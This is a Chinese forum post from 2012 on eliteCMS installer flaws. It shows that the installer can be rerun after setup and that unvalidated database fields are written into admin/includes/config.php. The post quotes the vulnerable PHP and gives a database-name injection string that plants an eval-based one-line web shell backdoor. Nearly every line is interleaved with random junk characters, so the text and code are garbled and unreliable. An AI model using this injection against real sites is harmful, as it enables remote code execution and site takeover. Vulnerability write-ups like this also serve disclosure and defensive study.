eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
4 \6 F8 F5 |& P- @8 e S& `4 W% b( R& ^ D$ ]+ U6 Y
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
+ x" `' b* t- v我们来看代码:
/ H5 Z s/ l. d# o' q - M: P3 ?- D/ L: m6 p" ?) `
..., W3 D4 r+ R) M
elseif ($_GET['step'] == "4") {
' _+ S6 [8 K- c $file = "../admin/includes/config.php";( f2 O! x, v& G; z+ c5 K2 y( W8 m
$write = "<?php\n";
3 K+ ~% v8 ^, T7 y $write .= "/**\n";6 U+ B% m- M3 v" k1 t
$write .= "*\n";
8 ^& [- L2 I+ I$ e0 i $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
e; ~0 @ h7 E& O( x4 x5 ~8 ^...略..., Y: ?& _5 {: A$ M4 w% P" j+ ^
$write .= "*\n";1 P! I- [( M$ s* R4 H
$write .= "*/\n";
2 F6 O }( [( G $write .= "\n";
% Q( \% O8 T* Q, |! @$ A* T $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 {8 q. i* c9 N* z# H! B( @ $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' \" u6 A/ r6 W
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
# G2 j/ s3 O* t1 \6 H. V $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
; }) x, v# P/ l& d $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";; [* X- d: D6 b0 D# T* d
$write .= "if (!\$connection) {\n";! `+ G/ ]4 G* ~! t/ \0 _5 U
$write .= " die(\"Database connection failed\" .mysql_error());\n";
. L, J6 H2 `& O& \* c2 z4 u $write .= " \n";6 m. G0 L' e, h1 |( v& m; x2 m
$write .= "} \n";* v# X W) @! j& r. h
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
4 h V* V3 Z& D- Q7 N; a $write .= "if (!\$db_select) {\n";
1 r4 r% @; B" n( }& B9 u% R/ K $write .= " die(\"Database select failed\" .mysql_error());\n";
9 N9 \5 V7 X6 u* x3 \ $write .= " \n";
; A. n9 t0 Y: u6 H! n& {& q $write .= "} \n";
# g7 x# `2 G# ~ M8 N! ] $write .= "?>\n";3 W3 b }% B* k" Z4 d
$ }2 t7 j1 n# d/ d3 s0 U
$writer = fopen($file, 'w');
; y. ^5 I# T3 m* T! y) {...+ B- ~% `) L$ d1 p$ L$ [
; @3 r/ h `/ j" N0 P: [7 f
在看代码:2 c0 B |8 Y1 h# I) Q
" A% m" x( f6 @
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];4 U# @1 h) p% q/ `, L- m0 q
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
. ?% y2 h; Y1 {, h/ ^$_SESSION['DB_USER'] = $_POST['DB_USER'];
# T) S7 P6 _' a$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
G9 m. u7 t$ r9 n9 m5 o
. Y: r; Y6 M2 i( R$ _取值未作任何验证: c) O. n; K z# a' u8 f
如果将数据库名POST数据:
# d5 I2 g7 c. s9 f5 ]
3 h; Q8 P3 v. p J% `! t"?><?php eval($_POST[c]);?><?php- t' z4 m. i F% h! \$ {% ?
" a" u# p1 ]9 M/ G& U
将导致一句话后门写入/admin/includes/config.php
9 K! ~( |3 u" b8 E" {! p4 r% U |
发表于 2012-11-18 13:59:27
收藏
支持
反对